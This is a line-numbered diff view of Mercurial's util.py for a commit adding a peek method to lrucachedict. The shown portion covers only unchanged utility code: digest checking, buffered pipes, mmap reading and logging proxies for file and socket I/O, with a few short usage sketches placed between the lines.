util: add method to peek item in lrucachedict...
Yuya Nishihara
r40915:0c638ff6 default
@@ -1,3987 +1,4001
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still has deprecation warnings enabled by default. We do not want
146 146 # to display anything to the standard user, so detect if we are running tests
147 147 # and only use python deprecation warnings in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, the module name set through PYTHONWARNINGS was matched exactly, so
154 154 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS approach useless for our use case.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue a python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % key)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
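A minimal usage sketch (the payload and the wrapped BytesIO below are illustrative; any file handle works) showing how digestchecker validates streamed content against an expected size and digest:

import hashlib
import io

payload = b'some payload'
expected = {'sha1': nodemod.hex(hashlib.sha1(payload).digest())}
fh = digestchecker(io.BytesIO(payload), len(payload), expected)
while fh.read(4096):
    pass
fh.validate()  # raises error.Abort on a size or digest mismatch
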
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class lets us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True if any data is currently buffered
310 310
311 311 This will be used externally as a pre-step for polling IO. If there is
312 312 already buffered data then no polling should be put in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if len(self._buffer) > 1:
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapses it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif len(self._buffer) > 1:
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if len(self._buffer) > 1:
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
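A sketch of the intended collaboration with polling (assuming a POSIX pipe): hasbuffer tells the caller whether select() can be skipped because data is already buffered.

import os
import select

rfd, wfd = os.pipe()
os.write(wfd, b'first line\nsecond')
pipe = bufferedinputpipe(os.fdopen(rfd, r'rb'))

line = pipe.readline()      # 'first line\n'; the rest stays buffered
if not pipe.hasbuffer:      # only poll when the buffer is drained
    select.select([pipe], [], [], 0)
rest = pipe.read(6)         # 'second', served straight from the buffer
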
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
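For example (using a throwaway temp file on POSIX), the returned mmap supports slicing without reading the whole file up front; the OS pages data in lazily:

import tempfile

with tempfile.NamedTemporaryFile() as tmp:
    tmp.write(b'some revlog bytes')
    tmp.flush()
    with open(tmp.name, 'rb') as fp:
        data = mmapread(fp)          # an mmap object ('' for an empty file)
        assert data[:4] == b'some'   # sliced lazily, not read eagerly
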
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed is a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_into', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792 792 self._writedata(data)
793 793
794 794 def write(self, res, data):
795 795 if not self.writes:
796 796 return
797 797
798 798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 799 # returns the integer bytes written.
800 800 if res is None and data:
801 801 res = len(data)
802 802
803 803 if self.logdataapis:
804 804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805 805
806 806 self._writedata(data)
807 807
808 808 def flush(self, res):
809 809 if not self.writes:
810 810 return
811 811
812 812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813 813
814 814 # For observedbufferedinputpipe.
815 815 def bufferedread(self, res, size):
816 816 if not self.reads:
817 817 return
818 818
819 819 if self.logdataapis:
820 820 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 821 self.name, size, len(res)))
822 822
823 823 self._writedata(res)
824 824
825 825 def bufferedreadline(self, res):
826 826 if not self.reads:
827 827 return
828 828
829 829 if self.logdataapis:
830 830 self.fh.write('%s> bufferedreadline() -> %d' % (
831 831 self.name, len(res)))
832 832
833 833 self._writedata(res)
834 834
835 835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 836 logdata=False, logdataapis=True):
837 837 """Turn a file object into a logging file object."""
838 838
839 839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 840 logdata=logdata, logdataapis=logdataapis)
841 841 return fileobjectproxy(fh, observer)
842 842
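A sketch of wiring this up (assuming Python 2 string semantics, matching how this module is written): reads and writes on the proxy are mirrored as human-readable lines into the log handle. makeloggingsocket() below provides the same facility for sockets.

import io

log = io.BytesIO()
fh = makeloggingfileobject(log, io.BytesIO(b'hello'), b'src', logdata=True)
fh.read(5)
# log now contains: src> read(5) -> 5: hello
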
843 843 class socketobserver(baseproxyobserver):
844 844 """Logs socket activity."""
845 845 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 846 logdata=False, logdataapis=True):
847 847 self.fh = fh
848 848 self.name = name
849 849 self.reads = reads
850 850 self.writes = writes
851 851 self.states = states
852 852 self.logdata = logdata
853 853 self.logdataapis = logdataapis
854 854
855 855 def makefile(self, res, mode=None, bufsize=None):
856 856 if not self.states:
857 857 return
858 858
859 859 self.fh.write('%s> makefile(%r, %r)\n' % (
860 860 self.name, mode, bufsize))
861 861
862 862 def recv(self, res, size, flags=0):
863 863 if not self.reads:
864 864 return
865 865
866 866 if self.logdataapis:
867 867 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 868 self.name, size, flags, len(res)))
869 869 self._writedata(res)
870 870
871 871 def recvfrom(self, res, size, flags=0):
872 872 if not self.reads:
873 873 return
874 874
875 875 if self.logdataapis:
876 876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 877 self.name, size, flags, len(res[0])))
878 878
879 879 self._writedata(res[0])
880 880
881 881 def recvfrom_into(self, res, buf, size, flags=0):
882 882 if not self.reads:
883 883 return
884 884
885 885 if self.logdataapis:
886 886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 887 self.name, size, flags, res[0]))
888 888
889 889 self._writedata(buf[0:res[0]])
890 890
891 891 def recv_into(self, res, buf, size=0, flags=0):
892 892 if not self.reads:
893 893 return
894 894
895 895 if self.logdataapis:
896 896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 897 self.name, size, flags, res))
898 898
899 899 self._writedata(buf[0:res])
900 900
901 901 def send(self, res, data, flags=0):
902 902 if not self.writes:
903 903 return
904 904
905 905 self.fh.write('%s> send(%d, %d) -> %d' % (
906 906 self.name, len(data), flags, len(res)))
907 907 self._writedata(data)
908 908
909 909 def sendall(self, res, data, flags=0):
910 910 if not self.writes:
911 911 return
912 912
913 913 if self.logdataapis:
914 914 # Returns None on success. So don't bother reporting return value.
915 915 self.fh.write('%s> sendall(%d, %d)' % (
916 916 self.name, len(data), flags))
917 917
918 918 self._writedata(data)
919 919
920 920 def sendto(self, res, data, flagsoraddress, address=None):
921 921 if not self.writes:
922 922 return
923 923
924 924 if address:
925 925 flags = flagsoraddress
926 926 else:
927 927 flags = 0
928 928
929 929 if self.logdataapis:
930 930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 931 self.name, len(data), flags, address, res))
932 932
933 933 self._writedata(data)
934 934
935 935 def setblocking(self, res, flag):
936 936 if not self.states:
937 937 return
938 938
939 939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940 940
941 941 def settimeout(self, res, value):
942 942 if not self.states:
943 943 return
944 944
945 945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946 946
947 947 def gettimeout(self, res):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952 952
